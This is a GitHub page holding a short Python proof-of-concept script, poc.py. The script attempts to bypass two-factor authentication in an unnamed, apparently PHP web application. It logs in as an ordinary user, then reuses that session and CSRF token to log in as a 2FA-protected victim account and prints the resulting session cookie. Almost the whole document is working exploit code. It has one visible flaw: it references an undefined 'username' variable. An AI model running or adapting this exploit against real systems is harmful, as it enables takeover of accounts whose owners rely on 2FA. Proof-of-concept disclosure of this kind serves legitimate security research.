-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpoc.py
46 lines (32 loc) · 1.38 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import re
###############################
## Author: Patrik Mayor #
###############################
########## FILL THIS ##########
url = "http://127.0.0.1/"
password = "normaluserpassword" # Password for the user without TFA
victim_username = "supersecureadminaccount" # Username for the user who has TFA enabled
victim_password = "supersecureadminaccountpassword" # Password for the user who has TFA enabled
###############################
proxy = {} # OPTIONAL proxy setting, for example: {"http":"127.0.0.1:8080"}
session = requests.Session()
def get_csrf_token():
response = session.get(url,proxies=proxy)
regex = r'"hidden" value="(.*?)">\'\)\.attr\(\''
csrf_search = re.search(regex, response.text, re.IGNORECASE)
if csrf_search:
csrf_token = csrf_search.group(1)
else:
print("Could not get CSRF token, exiting...")
exit()
return csrf_token
token=get_csrf_token()
session.post(url,data={"login_user":username,"pass_user":password,"csrf_token":token},proxies=proxy)
response = session.post(url,data={"login_user":victim_username,"pass_user":victim_password,"csrf_token":token},allow_redirects=False,proxies=proxy)
if response.status_code == 302:
print("PoC works!\n")
print("PHPSESSID="+session.cookies["PHPSESSID"])
else:
print("PoC does not work!")